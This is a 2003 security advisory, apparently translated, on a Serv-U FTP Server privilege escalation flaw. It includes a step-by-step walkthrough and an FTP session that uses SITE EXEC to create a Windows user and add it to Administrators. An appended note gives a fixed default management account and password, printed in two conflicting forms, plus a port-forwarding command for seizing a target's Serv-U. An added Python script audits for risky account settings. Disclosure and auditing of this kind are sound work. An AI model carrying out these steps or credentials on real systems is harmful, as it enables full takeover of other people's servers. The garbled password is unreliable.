Created: 2003-12-24 Updated: 2003-12-24
Article attribute: original
Article submission:
Fedora (Justaid_at_sohu.com)
(If you can't publish, please do not transfer to the forum, thank you.)
Discovery time: 2003-12-20
Author: Fedora (justaid_at_sohu.com)
Vulnerability Description:
Serv-U FTP Server is FTP server software produced by Rhinosoft that runs on the Microsoft Windows platform.
Servuadmin.exe is the FTP server's management interface. Because it handles exceptions incorrectly, when Serv-U
is registered as a system service a local ordinary user can obtain superuser permissions. A remote attacker with
ordinary user privileges can also escalate by logging in through port 3389.
Testing method:
Test environment:
Microsoft Windows 2000 (SP4) Serv-U FTP Server 4.0.0.4
Microsoft Windows Server 2003, Enterprise Edition Serv-U FTP Server 4.0.0.4
Testing method:
First, install Serv-U
An ordinary user does not have sufficient privileges to install it, so log in again as Administrator and install
Serv-U (default installation; with the defaults, Serv-U's startup type is automatic and it is registered as a
system service). After installation, start Serv-U, then log out of Administrator.
Second, escalate privileges
Log in as an ordinary user, go to the Serv-U FTP Server installation directory and run Servuadmin.exe. Create a
new domain and add a user: create the user ftpuser and set its home directory to the system drive C:. At this
point the access of user ftpuser is R ---- L - i. Set the user's privilege to System Administrator, or even
higher, or set the user's access to the directory to read, write and delete. A message pops up saying that
servuadmin.ini cannot be written, but servuadmin.exe still rewrites servuadmin.ini with SYSTEM permissions. The
user ftpuser now has FTP permissions up to deleting the system directory. With these permissions the user can
upload a trojan and run it, or directly add a system user.
FTP> Open IP
Connected to IP.
220 Serv-U FTP Server V4.0 for Winsock Ready ...
User (IP: (NONE)): FTPUSER // Enter the FTP user
331 USER Name Okay, please send complete e-mail address as password.
Password: password // password
230 User logged in, proceed.
FTP> CD WinNT // Enter Win2K's Winnt directory; on WinXP or Win 2003 it is the Windows directory.
250 Directory Changed to /Winnt
FTP> CD System32 // Enter the System32 directory
250 Directory Changed to /Winnt/System32
FTP> Quote Site EXEC NET.EXE User CC CC /Add // Add a user with the net command
200 Exec Command Successful (TID = 33).
FTP> Quote Site Exec Net.exe localgroup Administrators CC /Add // Promote to superuser
Vulnerability analysis
1. Serv-U can only be installed by Administrator. Under NTFS, ordinary users by default have only read and
execute permissions on its configuration files servudaemon.ini and servuadmin.ini (by default only Admin and
System have write permission), so they cannot rewrite them to escalate privileges.
2. When Serv-U runs as a system service it has SYSTEM privileges. Although servuadmin.exe performs a permission
check, its exception handling is incorrect and servuadmin.ini is written anyway, which produces the vulnerability.
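A defender's check for the condition analysed above, as an added example that is not part of the original advisory and not Serv-U's own code: it audits a ServUDaemon.ini-style file for FTP accounts that hold system administrator privilege, or whose home directory or access rules cover the Windows system directory with execute or write rights. The section and key names ([USER=...], HomeDir, Maintenance, AccessN=path|flags) and the flag letters E and W are assumptions about the file layout, and the sample data is constructed.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample; section/key names and flag letters are assumptions.
SAMPLE_INI = r"""
[USER=ftpuser|1]
HomeDir=c:\
Maintenance=System
Access1=C:\|RWAMELCDP
[USER=reports|1]
HomeDir=d:\ftp\reports
Access1=D:\ftp\reports|RLP
"""

SYSTEM_DIRS = [PureWindowsPath(p) for p in (r"C:\WINNT", r"C:\WINDOWS")]
RISKY_FLAGS = {"E": "execute", "W": "write"}  # assumed flag letters


def covers_system_dir(path):
    """True if path is a system directory, or an ancestor or child of one."""
    p = PureWindowsPath(path)
    return any(p == s or p in s.parents or s in p.parents for s in SYSTEM_DIRS)


def audit(ini_text):
    """Return {user: [findings]} for FTP accounts that reach the system directory."""
    findings, user = {}, None
    for line in map(str.strip, ini_text.splitlines()):
        m = re.match(r"\[USER=([^|\]]+)", line)
        if m or line.startswith("["):
            user = m.group(1) if m else None  # other sections end the user block
            continue
        if user is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        notes = findings.setdefault(user, [])
        if key == "Maintenance" and value.lower() == "system":
            notes.append("system administrator privilege")
        elif key == "HomeDir" and covers_system_dir(value):
            notes.append(f"home directory {value} covers the system directory")
        elif key.startswith("Access") and "|" in value:
            path, flags = value.rsplit("|", 1)
            risky = [n for f, n in RISKY_FLAGS.items() if f in flags.upper()]
            if risky and covers_system_dir(path):
                notes.append(f"{'/'.join(risky)} on {path}")
    return {u: n for u, n in findings.items() if n}


if __name__ == "__main__":
    for name, notes in audit(SAMPLE_INI).items():
        print(name, "->", "; ".join(notes))
```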
Thanks to Purple Fantasy; without his articles, I would not have had the idea of looking into Serv-U.
Statement
This article is intended only to describe a possible security issue. The author provides no guarantee or
commitment regarding this security announcement. Any direct or indirect consequences arising from the
dissemination or use of the information in this article are the responsibility of the user; the author accepts
no responsibility for them. The author reserves the right to modify and interpret this security announcement.
If you reprint or disseminate this article, you must preserve it in full, including all content such as the
copyright statement. The announcement may not be modified or added to without the author's permission.
Eyas Note:
Serv-U's management port defaults to 127.0.0.1:43958, so only the local machine can connect to this management port.
Serv-U's default management account is LocalAdministrator and the default password is "#L@ or @ $#.lk; 0 @p".
This password is fixed within the same version; perhaps it is also fixed across different versions.
If the target machine's IP is 192.168.0.1 and you already have a shell with ordinary privileges on the target
machine, then run FPIPE -V -L 12345 -R 43958 127.0.0.1 on the target machine, and in "Serv-U" on your own
machine choose "New Server" with:
192.168.0.1:12345
User: LocalAdministrator
Pass: "# l@lk#.lk; 0 @p"
Then you can manage the Serv-U of the target machine.
(You don't need to log in through the terminal service or at the physical console; as long as you have a shell, you can run a port-forwarding program.)